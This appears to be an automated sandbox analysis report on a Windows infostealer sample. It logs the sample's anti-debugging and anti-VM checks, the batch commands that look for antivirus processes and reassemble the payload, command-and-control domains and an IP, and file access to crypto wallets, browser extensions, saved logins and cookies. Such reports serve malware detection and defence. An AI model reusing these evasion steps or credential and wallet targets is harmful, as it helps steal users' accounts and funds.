                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: es5qBEFupj.exe, 00000000.00000002.1321366859.0000000000342000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: vmware
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: es5qBEFupj.exe, 00000000.00000003.1280366142.0000000005300000.00000004.00001000.00020000.00000000.sdmp, es5qBEFupj.exe, 00000000.00000002.1321366859.0000000000342000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: <Module>laddad.exeProgramStubWriterRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorencryptTypecompressedcversSystem.Collections.GenericList`1fileNamesfileTypesfileRunTypesfileDropPathsMainDecompressEncryptOrDecryptXORDecryptEncryptInitalizeIEnumerable`1EncryptOutputSwapGetResourceRunOnStartup.ctorWriteAllBytesExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatordatatextkeysijfileregNameAppPathHidefileBytesfinalPathpathrunTypelpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeladdadEnvironmentExitSystem.ThreadingThreadSleepget_ItemStringop_EqualitySystem.TextEncodingget_UnicodeGetBytesConcatSystem.IOPathCombineget_CountMemoryStreamSystem.IO.CompressionDeflateStreamStreamCompressionModeCopyToIDisposableDisposeToArrayByteSystem.CoreSystem.LinqEnumerable<EncryptInitalize>b__0Func`2CS$<>9__CachedAnonymousMethodDelegate1CompilerGeneratedAttributeRangeSelect<>c__DisplayClass3<EncryptOutput>b__2bAssemblyGetExecutingAssemblySystem.ResourcesResourceManagerGetObjectAppDomainget_CurrentDomainget_FriendlyNameFileExistsGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineget_UTF8GetStringOpenSubKeySetValueCurrentUserException.cctorConvertFromBase64StringAddGetTempPathSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_CurrentToStringToLowerToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticksin1jhvfotsq.resources
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: es5qBEFupj.exe, 00000000.00000002.1322469608.0000000000C64000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\es5qBEFupj.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\es5qBEFupj.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\es5qBEFupj.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\es5qBEFupj.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\es5qBEFupj.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\es5qBEFupj.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\es5qBEFupj.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\es5qBEFupj.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\es5qBEFupj.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\es5qBEFupj.exeFile opened: SICE
                Source: C:\Users\user\Desktop\es5qBEFupj.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0012F4FF BlockInput,21_2_0012F4FF
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000B338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,21_2_000B338B
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 7_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,7_2_00406328
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000D5058 mov eax, dword ptr fs:[00000030h]21_2_000D5058
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_001120AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,21_2_001120AA
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000E2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000E2992
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000D0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_000D0BAF
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000D0D45 SetUnhandledExceptionFilter,21_2_000D0D45
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000D0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_000D0F91
                Source: C:\Users\user\Desktop\es5qBEFupj.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Climb.com, 00000015.00000003.1524980481.0000000001109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
                Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
                Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
                Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
                Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
                Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
                Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
                Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
                Source: Climb.com, 00000015.00000002.2509360783.00000000039D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: spuriotis.click
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_00111B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,21_2_00111B4D
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000B338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,21_2_000B338B
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0011BBED SendInput,keybd_event,21_2_0011BBED
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0011EC6C mouse_event,21_2_0011EC6C
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe" Jump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeProcess created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ReflectJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled VJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com VJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_001114AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,21_2_001114AE
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_00111FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,21_2_00111FB0
                Source: Climb.com, 00000015.00000003.1531954066.0000000003DEA000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmp, Alt.18.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: es5qBEFupj.exe, es5qBEFupj.exe, 00000000.00000002.1322469608.0000000000C64000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: Climb.comBinary or memory string: Shell_TrayWnd
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000D0A08 cpuid 21_2_000D0A08
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0010E5F4 GetLocalTime,21_2_0010E5F4
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0010E652 GetUserNameW,21_2_0010E652
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000EBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,21_2_000EBCD2
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 7_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,7_2_00406831
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: procmon.exe
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drBinary or memory string: wireshark.exe
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Climb.com PID: 7780, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
                Source: Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
                Source: Climb.com, 00000015.00000002.2508538313.00000000010ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                Source: Climb.com, 00000015.00000002.2508841125.0000000001158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: Climb.com, 00000015.00000002.2508538313.00000000010ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                Source: Climb.com, 00000015.00000002.2508980283.00000000038D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152
                Source: Climb.com, 00000015.00000002.2508841125.0000000001158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Climb.com, 00000015.00000002.2508538313.00000000010ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: global trafficTCP traffic: 192.168.2.7:49726 -> 194.87.58.92:80
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
